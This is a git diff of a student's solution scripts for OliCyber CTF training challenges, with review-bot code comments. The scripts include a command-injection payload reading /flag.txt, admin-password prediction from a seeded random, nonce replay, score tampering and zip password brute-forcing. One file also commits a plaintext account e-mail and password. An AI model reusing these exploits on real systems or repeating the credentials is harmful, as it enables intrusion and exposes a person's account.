diff --git a/2048.py b/2048.py
new file mode 100644
index 0000000..92c4056
--- /dev/null
+++ b/2048.py
@@ -0,0 +1,36 @@
+from pwn import *
+
+host = "2048.challs.olicyber.it"
+port = 10007
+
+r = remote(host, port)
+print(r.recvuntil(b":"))
+
+q = log.progress("Question: ")
+ans = log.progress("Answer: ")
+
+def computeAnswer(type, arg1, arg2):
+ operations = {
+ "SOMMA": lambda a, b: a + b,
+ "DIFFERENZA": lambda a, b: a - b,
+ "PRODOTTO": lambda a, b: a * b,
+ "DIVISIONE": lambda a, b: a / b,
+ "POTENZA": lambda a, b: a ** b,
+ "DIVISIONE_INTERA": lambda a, b: a // b,
+ }
+ return operations[type](arg1, arg2)
+
+
+for i in range (0,2048):
+ question = r.recv().decode("utf-8").strip()
+ q.status(str(i) + ":"+question)
+ if (len(question) == 0):
+ print("Error "+ r.recv().decode("utf-8"))
+ break
+ #q.status(question)
+ split = question.split(" ")
+ answer = computeAnswer(split[0], int(split[1]), int(split[2]))
+ ans.status(str(answer))
+ r.send(str(answer).encode("utf-8") + b"\n")
+print(r.recv().decode("utf-8"))
+
diff --git a/CHAOS/CHAOS.pcap b/CHAOS/CHAOS.pcap
new file mode 100644
index 0000000..4891212
Binary files /dev/null and b/CHAOS/CHAOS.pcap differ
diff --git a/CHAOS/CHAOS.py b/CHAOS/CHAOS.py
new file mode 100644
index 0000000..f6164d0
--- /dev/null
+++ b/CHAOS/CHAOS.py
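Review bot: In 2048.py the loop reads each question with `r.recv()`, which returns whatever bytes have arrived rather than one complete question, so a prompt split across segments or two prompts arriving together make `split[1]`/`split[2]` raise or pick up the wrong operands. If the service newline-terminates its prompts, `question = r.recvline().decode("utf-8").strip()` ties one iteration to one question. `DIVISIONE` uses `/`, so the reply is a float such as `2.0`; confirm the service accepts that or use the integer form. The parameter name `type` shadows the builtin, and the `operations` table is rebuilt on every call although it could be a module-level constant.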
@@ -0,0 +1,43 @@
+import pyshark
+
+# Path al file pcap
+capture_file = '/home/sergio/ProgettiProgrammazione/Python/CyberChallenge/CHAOS/CHAOS.pcap'
+
+# filtro che vogliamo applicare
+display_filter = 'tcp.analysis.retransmission'
+
+# lista dei payload
+payloads = []
+
+# in questo caso prendo il valore del payload tcp
+def extract_payload(packet):
+ try:
+ return packet.tcp.payload.raw_value
+ except AttributeError:
+ return None
+
+# apro il pcap
+cap = pyshark.FileCapture(capture_file, display_filter=display_filter)
+
+packet_list = []
+
+# salvo i pacchetti in una lista per poterli ordinare in ordine cronologico
+for packet in cap:
+ packet_list.append(packet)
+#ordino i pacchetti in ordine cronologico
+packet_list.sort(key=lambda packet: packet.sniff_time)
+
+# estraggo i payload
+for packet in packet_list:
+ payload = extract_payload(packet)
+ if payload is not None:
+ payloads.append(payload)
+
+# chiudo il pcap
+cap.close()
+
+flag = ""
+# appendo i payload in una stringa
+for idx, payload in enumerate(payloads, start=1):
+ flag+= chr(int(payload, 16))
+print(flag)
diff --git a/Privnotes.py b/Privnotes.py
new file mode 100644
index 0000000..d861d56
--- /dev/null
+++ b/Privnotes.py
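Review bot: In CHAOS/CHAOS.py the final loop's `chr(int(payload, 16))` is only correct when every retransmitted segment carries exactly one byte; a longer payload is turned into a single large code point, or a ValueError above 0x10FFFF, instead of its bytes. Assuming `raw_value` is a plain hex string, as the existing `int(..., 16)` call implies, `flag += bytes.fromhex(payload).decode("latin-1")` handles any payload length. `cap.close()` is reached only if the iteration succeeds, so wrap the capture loop in `try/finally`. `capture_file` is an absolute path inside one user's home directory and should be built relative to `__file__`; the `idx` from `enumerate` is unused.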
@@ -0,0 +1,39 @@
+import requests
+import string
+import random
+import bs4
+import re
+
+url = "http://privnotes.challs.olicyber.it"
+login = "/login"
+register = "/register"
+users = "/users"
+notes = "/notes"
+
+def get_random_string(length):
+ # choose from all lowercase letter
+ letters = string.ascii_lowercase
+ result_str = ''.join(random.choice(letters) for i in range(length))
+ return result_str
+
+s = requests.Session()
+
+data = {
+ "username": get_random_string(7)
+}
+
+r = s.post(url + register, data=data)
+r = s.get(url + users)
+soup = bs4.BeautifulSoup(r.text, "html.parser")
+date = soup.find("time")
+date = date.get("raw")
+random.seed(float(date))
+password = "".join(random.choices(string.ascii_letters + string.digits, k=16))
+adminCredentials ={
+ "username": "admin",
+ "password": password
+}
+r = s.post(url + login, data=adminCredentials)
+r = s.get(url+ notes)
+flag = re.findall(r"flag\{[^}]*\}", r.text)
+print(flag[0])
diff --git a/ScoreboardGraph.py b/ScoreboardGraph.py
new file mode 100644
index 0000000..068698c
--- /dev/null
+++ b/ScoreboardGraph.py
@@ -0,0 +1,30 @@
+import requests
+import bs4
+from fake_useragent import UserAgent
+
+scoreboardUrl = "https://training.olicyber.it/scoreboard"
+
+loginUrl = "https://training.olicyber.it/login"
+
+r = requests.session()
+
+
+
+loginData = {
+ "email":"sergiocibecchini.productivity@gmail.com",
+ "password":"HJL4Pd&4q26$D8B@"
+}
+headers = {'User-Agent': str(UserAgent().chrome)}
+r.get(scoreboardUrl, headers=headers)
+answ = r.post(loginUrl, headers=headers, data=loginData)
+
+print(answ.text)
+
+soup = bs4.BeautifulSoup(answ.text, 'html.parser')
+
+scoreTable = soup.find('table', {'class': 'm-0 text-nowrap table table-striped table-bordered table-hover'})
+
+placeScoreDict = {}
+
+print(scoreTable)
+
diff --git a/TIMP.py b/TIMP.py
new file mode 100644
index 0000000..a4ec7e7
--- /dev/null
+++ b/TIMP.py
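Review bot: Privnotes.py dereferences `soup.find("time")` and `flag[0]` without checking them, so a changed page layout or a rejected login ends in an AttributeError or IndexError that does not say which step failed. A guard such as `if date is None: raise SystemExit("no <time> element on /users")` plus a check of `r.status_code` after the login POST would make failures diagnosable. The script also needs a header comment stating why it works: the password is reproduced by seeding `random` with the published `raw` timestamp, which is exactly why service code should generate credentials with `secrets` and never with a seeded `random`. It further assumes the first `<time>` element belongs to the admin account, which deserves a comment or an explicit lookup.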
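Review bot: ScoreboardGraph.py commits an account e-mail and password in the `loginData` literal; once pushed they stay in the repository history, so the password should be rotated and the committed value treated as exposed. Read both at runtime instead, for example `"email": os.environ["OLICYBER_EMAIL"]` and `"password": getpass.getpass()` (the variable name is only an example; this needs `import os` and `import getpass`). `print(answ.text)` writes the whole post-login page to the terminal and any captured logs, where printing `scoreTable` alone would do. `placeScoreDict` is assigned and never used.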
@@ -0,0 +1,18 @@
+import requests
+
+
+url = "http://timp.challs.olicyber.it"
+handler = "/handler.php"
+
+s = requests.Session()
+
+result = ""
+
+for i in range (5):
+ payload = 'dd${IFS}if=/flag.txt${IFS}bs=1${IFS}skip='+str(i*10)
+ params = {
+ "cmd": payload
+ }
+ r = s.post(url+handler, data=params)
+ result += r.text
+print(result)
\ No newline at end of file
diff --git a/cicada 1337.py b/cicada 1337.py
new file mode 100644
index 0000000..35ff722
--- /dev/null
+++ b/cicada 1337.py
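Review bot: TIMP.py has no comment explaining the constants the loop depends on: `range (5)` and the `i*10` stride presumably reflect an output limit and file length observed on the service, but neither is stated, so the reader cannot tell whether `result` is complete. Every response is appended to `result` unchecked, so an error page from the handler ends up concatenated into the output; call `r.raise_for_status()` before `result += r.text`. The `s.post` call has no `timeout=`, so a stalled connection hangs the script.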
@@ -0,0 +1,117 @@
+import subprocess
+import re
+
+
+def is_prime(number):
+ if number <= 1:
+ return False
+ elif number <= 3:
+ return True
+ elif number % 2 == 0 or number % 3 == 0:
+ return False
+
+ i = 5
+ while i * i <= number:
+ if number % i == 0 or number % (i + 2) == 0:
+ return False
+ i += 6
+
+ return True
+
+# Path to the image file
+image_path = "/home/sergio/Desktop/congratulations.png"
+
+# Construct the command as a list of arguments
+command = ["identify", "-verbose", image_path]
+
+# Execute the command and capture the output
+completed_process = subprocess.run(command, capture_output=True, text=True)
+
+# Get the captured output
+output = completed_process.stdout
+
+# Print or manipulate the captured output as needed
+print(output)
+
+numbers = re.findall(r'\s-?\b\d+\b\s', output)
+
+prime = []
+
+for number in numbers:
+ if is_prime(int(number)) and number not in prime:
+ prime.append(number)
+prime = prime[:3]
+num = 1
+for i in range (len(prime)):
+ prime[i] = int(prime[i].strip())
+ num *= prime[i]
+
+print(prime)
+print(num)
+
+text = '''{A KOAN}
+A MAN DECIDED TO GO AND STUDY WITH A MASTER
+HE WENT TO THE DOOR OF THE MASTER
+"WHO ARE YOU WHO WISHES TO STUDY HERE" ASKED THE MASTER
+THE STUDENT TOLD THE MASTER HIS NAME
+"THAT IS NOT WHO YOU ARE, THAT IS ONLY WHAT YOU ARE CALLED
+WHO ARE YOU WHO WISHES TO STUDY HERE" HE ASKED AGAIN
+THE MAN THOUGHT FOR A MOMENT, AND REPLIED "I AM A PROFESSOR"
+"THAT IS WHAT YOU DO, NOT WHO YOU ARE," REPLIED THE MASTER
+"WHO ARE YOU WHO WISHES TO STUDY HERE"
+CONFUSED, THE MAN THOUGHT SOME MORE
+FINALLY, HE ANSWERED, "I AM A HUMAN BEING"
+"THAT IS ONLY YOUR SPECIES, NOT WHO YOU ARE
+WHO ARE YOU WHO WISHES TO STUDY HERE", ASKED THE MASTER AGAIN
+AFTER A MOMENT OF THOUGHT, THE PROFESSOR REPLIED "I AM A CONSCIOUSNESS INHABITING AN ARBITRARY BODY"
+"THAT IS MERELY WHAT YOU ARE, NOT WHO YOU ARE
+WHO ARE YOU WHO WISHES TO STUDY HERE"
+THE MAN WAS GETTING IRRITATED
+"I AM," HE STARTED, BUT HE COULD NOT THINK OF ANYTHING ELSE TO SAY, SO HE TRAILED OFF
+AFTER A LONG PAUSE THE MASTER REPLIED, "THEN YOU ARE WELCOME TO COME STUDY' '''
+
+# Split the text into an array where each row is an element
+text_array = text.split('\n')
+
+# Remove empty lines
+text_array = [line for line in text_array if line.strip()]
+
+# Print the resulting array
+for row in text_array:
+ print(row)
+
+indexes = [
+ 9, 43,
+ 19, 50,
+ 5, 35,
+ 1, 1,
+ 14, 41,
+ 19, 10,
+ 12, 11,
+ 7, 44,
+ 5, 23,
+ 20, 11,
+ 6, 58,
+ 16, 22,
+ 20, 63,
+ 8, 12,
+ 17, 27,
+ 2, 34,
+ 9, 4,
+ 20, 34,
+ 19, 57,
+ 15, 35,
+ 8, 44,
+ 15, 80,
+ 18, 29,
+ 1, 8
+]
+
+flag = ""
+
+print(indexes[9])
+
+for i in range (0, len(indexes), 2):
+ flag += text_array[indexes[i] - 1][indexes[i + 1] - 1]
+
+print(flag)
\ No newline at end of file
diff --git a/execute-me.py b/execute-me.py
new file mode 100644
index 0000000..a3cc1e2
--- /dev/null
+++ b/execute-me.py
@@ -0,0 +1,6 @@
+
+ # Open the binary file in read mode
+with open('/tmp/execute-me', 'rb') as file:
+ binary_data = file.read()
+ text_data = binary_data.decode('utf-8', errors='ignore')
+ print(text_data)
\ No newline at end of file
diff --git a/import requests.py b/import requests.py
new file mode 100644
index 0000000..d68a931
--- /dev/null
+++ b/import requests.py
@@ -0,0 +1,9 @@
+import requests
+import re
+
+url = "http://roller.challs.olicyber.it/get_flag.php"
+
+
+r = requests.get(url, allow_redirects=False)
+
+print(re.findall(r'flag{.*}', r.text)[0])
\ No newline at end of file
diff --git a/infiniteServer.py b/infiniteServer.py
new file mode 100644
index 0000000..9eff041
--- /dev/null
+++ b/infiniteServer.py
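Review bot: In `cicada 1337.py` the test `number not in prime` compares the raw regex matches, which still carry their surrounding whitespace, so the same prime captured once between spaces and once between newlines is stored twice and `prime[:3]` can contain a duplicate. Convert before comparing: `n = int(number)` followed by `if is_prime(n) and n not in prime: prime.append(n)`, which also makes the later strip-and-int pass unnecessary. Because the pattern `\s-?\b\d+\b\s` consumes the trailing whitespace, the second of two numbers separated by a single space is never matched; a lookaround form such as `(?<!\S)-?\d+(?!\S)` avoids that. `subprocess.run` is called without `check=True`, so a missing image file gives an empty `output` and a silent `num` of 1, and `print(indexes[9])` looks like leftover debugging.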
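Review bot: In `import requests.py` the pattern `flag{.*}` is greedy and matches through the last `}` on the line, so any markup after the flag is printed with it; Privnotes.py in this same commit already uses the tighter `flag\{[^}]*\}`, and this file should match it. Indexing the `findall` result with `[0]` raises a bare IndexError when the response holds no flag, and the `requests.get` call has no `timeout=`. The file name itself, with a space in it, looks accidental and cannot be imported as a module.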
@@ -0,0 +1,80 @@
+import requests
+import bs4
+import re
+from pwn import *
+url = "http://infinite.challs.olicyber.it/"
+
+def makeRequest():
+ r = requests.get(url)
+ soup = bs4.BeautifulSoup(r.text, 'html.parser')
+ return soup
+
+def getType(soup):
+ question = soup.find('h2').text
+ split = question.split(" ")
+ return split[0]
+
+def getQuestion (soup):
+ question = soup.find('p').text
+ return question
+
+def solveGrammar (question):
+ split = question.split('"')
+ letter = split[1]
+ word = split[3]
+ #number of letters in word
+ res = len(re.findall(letter, word))
+ data = {
+ 'letter': res
+ }
+ return data
+def solveMath (question):
+ split = question.split(" ")
+ num1 = int(split[2])
+ split[4] = split[4].replace("?", "")
+ num2 = int(split[4])
+ res = num1 + num2
+ data = {
+ 'sum': str(res)
+ }
+ return data
+def solveArt (question):
+ split = question.split(" ")
+ color = split[5].replace("?", "")
+ return color+"="
+
+r = requests.session()
+soup = makeRequest()
+
+q = log.progress("Question")
+a = log.progress("Answer")
+t = log.progress("Type")
+c = log.progress("Count")
+i = 0
+while(True):
+ i+=1
+ c.status(i)
+ type = getType(soup)
+ question = getQuestion(soup)
+ q.status(question)
+ t.status(type)
+ if type == "GRAMMAR":
+ data = solveGrammar(question)
+ elif type == "MATH":
+ data = solveMath(question)
+ elif type == "ART":
+ data = solveArt(question)
+ else:
+ print("Error")
+ answ = r.post(url, data=data)
+ a.status(str(data))
+ if ("WRONG" in answ.text):
+ print("WRONG")
+ break
+ elif ("flag" in answ.text):
+ print("FLAG: "+answ.text)
+ break
+ soup = bs4.BeautifulSoup(answ.text, 'html.parser')
+
+
+
diff --git a/intoLinuxRabbitHole.py b/intoLinuxRabbitHole.py
new file mode 100644
index 0000000..4e2ef10
--- /dev/null
+++ b/intoLinuxRabbitHole.py
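Review bot: In infiniteServer.py `solveGrammar` passes the letter taken from the page straight to `re.findall(letter, word)`, so a regex metacharacter in that position (`.`, `?`, `(`) miscounts or raises; `res = word.count(letter)` performs the literal count that is intended. In the main loop the `else` branch only prints "Error" and then still posts `data`, which is undefined on the first iteration and stale on later ones, so that branch needs a `break`. `makeRequest()` fetches the first page with `requests.get` rather than the session `r`, so any cookie set by that first response is missing from the later POSTs. The loop variable `type` shadows the builtin.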
@@ -0,0 +1,23 @@
+from pwn import *
+import hashlib
+
+HOST = 'rabbit.challs.olicyber.it'
+PORT = 10501
+r = remote(HOST, PORT)
+
+r.recvuntil(b'Execute:')
+val = r.recv().decode().strip().split()
+
+target = val[2]
+
+i = 0
+while True:
+ h = hashlib.sha1(str(i).encode('ascii')).hexdigest()
+ if h.endswith(target):
+ r.sendline(str(i).encode())
+ print('done')
+ break
+
+ i += 1
+
+r.interactive()
\ No newline at end of file
diff --git a/melodyInMyHead.py b/melodyInMyHead.py
new file mode 100644
index 0000000..7de234c
--- /dev/null
+++ b/melodyInMyHead.py
@@ -0,0 +1,27 @@
+from pwn import *
+
+host = "melody.challs.olicyber.it"
+port = 10020
+
+
+nonce0 = "02"
+right0 = b"0cce6bab87baa7031b69539ac1a211f202fc35cc8f3ac27fdb7e527527310f0e"
+
+while (True):
+ r = remote(host, port)
+ r.recvline()
+ nonce = r.recvline().decode().strip()
+ nonce = nonce.split(" ")[1]
+ if (nonce == nonce0):
+ r.sendline(right0)
+ r.recvline()
+ flag = r.recvline().decode().strip()
+ print(flag)
+ break
+ else:
+ r.close()
+ continue
+
+
+
+
diff --git a/readyPlayerOne.py b/readyPlayerOne.py
new file mode 100644
index 0000000..aa71bce
--- /dev/null
+++ b/readyPlayerOne.py
@@ -0,0 +1,28 @@
+import requests
+url = "http://rpo.challs.olicyber.it"
+dataUrl = url + "/data"
+flagUrl = url + "/verify"
+
+time = 0
+
+r = requests.session()
+
+ans = r.get(url).text
+
+def makeRequest (r, score, time):
+ data = {
+ "p1s" : score,
+ "p2s" : 0,
+ "time" : time
+ }
+ answ = r.post(dataUrl, data=data)
+ return answ.text
+
+for i in range(0, 5):
+ answ = makeRequest(r, i + 1, i + 10)
+ print(answ)
+answ = r.get(flagUrl).text
+print(answ)
+
+
+
diff --git a/soundofsilence.py b/soundofsilence.py
new file mode 100644
index 0000000..5c65775
--- /dev/null
+++ b/soundofsilence.py
@@ -0,0 +1,11 @@
+import requests
+url = "http://soundofsilence.challs.olicyber.it"
+
+r = requests.session()
+
+data = {
+ "input[]": b'aa'
+}
+
+answ = r.post(url, data=data)
+print(answ.text)
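Review bot: In intoLinuxRabbitHole.py the challenge line is read with `r.recv()` straight after `recvuntil(b'Execute:')`, and `recv()` may return only part of that line, in which case `val[2]` raises IndexError or `target` is a truncated suffix that the search then matches incorrectly. Reading a whole line, `val = r.recvline().decode().strip().split()`, and checking `len(val) > 2` before indexing removes the race. The `while True` search has no upper bound or progress output, so a malformed `target` (for example non-hex text) spins forever; a check that `target` is lowercase hex before the loop would catch that.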
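Review bot: In melodyInMyHead.py the `while (True)` loop opens a new connection per attempt with no delay and no attempt cap, so a service that is down or has changed its banner is hit in a tight loop indefinitely; bound it with `for attempt in range(MAX_TRIES):` and a short `time.sleep` in the `else` branch (`MAX_TRIES` being a constant you add). `nonce.split(" ")[1]` raises IndexError on any line without a space, and the connection is never closed on the success path. The file also needs a comment saying that `nonce0`/`right0` are a previously recorded nonce and response pair; that is the design flaw on show here, since a nonce space small enough to repeat lets a recorded response be replayed.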
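Review bot: In readyPlayerOne.py the module-level `time = 0` and `ans = r.get(url).text` are never read afterwards, and the `time` parameter of `makeRequest` shadows that global, which makes it look as though the global feeds the request when it does not. Drop `time = 0`, and if the initial GET is only there to obtain a session cookie, say so in a comment and do not bind its result. `makeRequest` also reads `dataUrl` from module scope while taking the session as a parameter; passing both, or neither, would be more consistent.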
diff --git a/wordwang.py b/wordwang.py
new file mode 100644
index 0000000..a63e05a
--- /dev/null
+++ b/wordwang.py
@@ -0,0 +1,42 @@
+import socket
+
+def send_tcp_request(host, port, data_list):
+ try:
+ # Create a TCP socket
+ with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
+ # Connect to the server (host and port)
+ sock.connect((host, port))
+
+ # Send the data in the specified order
+ for data in data_list:
+ sock.sendall(data.encode())
+ response = sock.recv(1024).decode()
+ print("Received response from server:", response)
+
+ except socket.error as e:
+ print("Error:", e)
+
+if __name__ == "__main__":
+ # Replace 'wordwang.challs.olicyber.it' and 10601 with the target host and port respectively
+ host = 'wordwang.challs.olicyber.it'
+ port = 10601
+
+ # Specify the data in the order you want to send to the server
+ data_list = [
+ "speech\n",
+ "SPEECH\n",
+ "spech\n",
+ "SPEECH\n",
+ "provide\n",
+ "one\n",
+ "one\n",
+ "one\n",
+ "one\n",
+ "WORDWANG\n",
+ "SPEECH?\n",
+ "?SPEECH!\n",
+ ]
+
+ send_tcp_request(host, port, data_list)
+
+#era molto più stupida di così, bastava fare il nc e vedere dal wireshark cosa mandare, ossia la parola con ! e ? in caps
\ No newline at end of file
diff --git a/zipCeption/flag.txt b/zipCeption/flag.txt
new file mode 100644
index 0000000..bcff92e
--- /dev/null
+++ b/zipCeption/flag.txt
@@ -0,0 +1 @@
+flag{Un0_z1p_d3n7r0_un0_z1p_1mp0551b1l3!}
diff --git a/zipCeption/flag0.zip b/zipCeption/flag0.zip
new file mode 100644
index 0000000..441622f
Binary files /dev/null and b/zipCeption/flag0.zip differ
diff --git a/zipCeption/zipCeption.py b/zipCeption/zipCeption.py
new file mode 100644
index 0000000..8471436
--- /dev/null
+++ b/zipCeption/zipCeption.py
@@ -0,0 +1,14 @@
+import os
+from pwn import *
+
+filename = "flag"
+l = log.progress("Unzipping")
+
+
+os.system("pwd")
+
+for i in range (3000, 0, -1):
+ os.system("unzip flag" + str(i) + ".zip")
+ os.system("rm flag" + str(i) + ".zip")
+ l.status(str(i))
+
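Review bot: In wordwang.py `send_tcp_request` calls `sock.recv(1024)` after every send on a socket with no timeout, so the script blocks forever as soon as the server does not answer one of the lines; a `sock.settimeout(5)` after `connect` (value to taste) turns that into a `socket.timeout` the existing `except` already reports. A single `recv` may also return only part of a reply, and `.decode()` raises if the chunk ends inside a multi-byte character. The closing comment notes that the scripted sequence turned out to be unnecessary, so `data_list` should be trimmed to what the server actually needs or the file marked as a first attempt.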
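Review bot: In zipCeption/zipCeption.py the loop runs `rm` unconditionally after `unzip` and ignores both exit codes, so if one extraction fails the archive still to be unpacked is deleted and every later iteration fails silently. The standard library does this without a shell: `zipfile.ZipFile(name).extractall()` followed by `os.remove(name)`, with `name = f"flag{i}.zip"`, raises on the first bad archive before anything is removed. `filename` is assigned and never used, and `os.system("pwd")` looks like leftover debugging.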
diff --git a/zipCeption2/100.zip b/zipCeption2/100.zip new file mode 100644 index 0000000..d9199f9 Binary files /dev/null and b/zipCeption2/100.zip differ diff --git a/zipCeption2/correct.txt b/zipCeption2/correct.txt new file mode 100644 index 0000000..a68bc19 --- /dev/null +++ b/zipCeption2/correct.txt @@ -0,0 +1,100 @@ +jesus +jasmine +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 diff --git a/zipCeption2/exploit.py b/zipCeption2/exploit.py new file mode 100644 index 0000000..474e369 --- /dev/null +++ b/zipCeption2/exploit.py @@ -0,0 +1,26 @@ +import os +from pwn import * + +filename = "flag" +u = log.progress("Unzipping") +p = log.progress("Password") +o = log.progress("Output") + +clear = False + +with open("correct.txt", "w") as correct: + for i in range(100, 0, -1): + u.status(str(i)) + with open("rockyou.txt", "r", encoding="latin-1") as f: + for passwd in f: + passwd = passwd.strip() + output = os.system("unzip -P " + passwd + " \'" + str(i) + ".zip\'") + o.status(output) + p.status(passwd) + if output != 20992: + correct.write(passwd+ "\n") + #if (i != 100 and i != 1): + #os.system("rm " + str(i) + ".zip") + break +if (clear): + open('correct.txt', 'w').close()
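Review bot: In zipCeption2/exploit.py every wordlist line is concatenated unquoted into the `os.system("unzip -P " + passwd + ...)` string, so an entry containing a space, quote, `;`, backtick or `$(...)` is interpreted by the local shell, and a public wordlist does contain such entries; an empty line also makes `unzip` take the archive name as the password. Pass an argument list instead: `rc = subprocess.run(["unzip", "-P", passwd, f"{i}.zip"]).returncode`, with `import subprocess` at the top. The success test should then be `if rc == 0:` rather than `output != 20992`, because 20992 is the raw wait status for exit code 82 and the current test records any other failure, such as a missing archive, as a correct password. `filename` is unused, and the `clear` branch reopens `correct.txt` only to truncate what the run has just written.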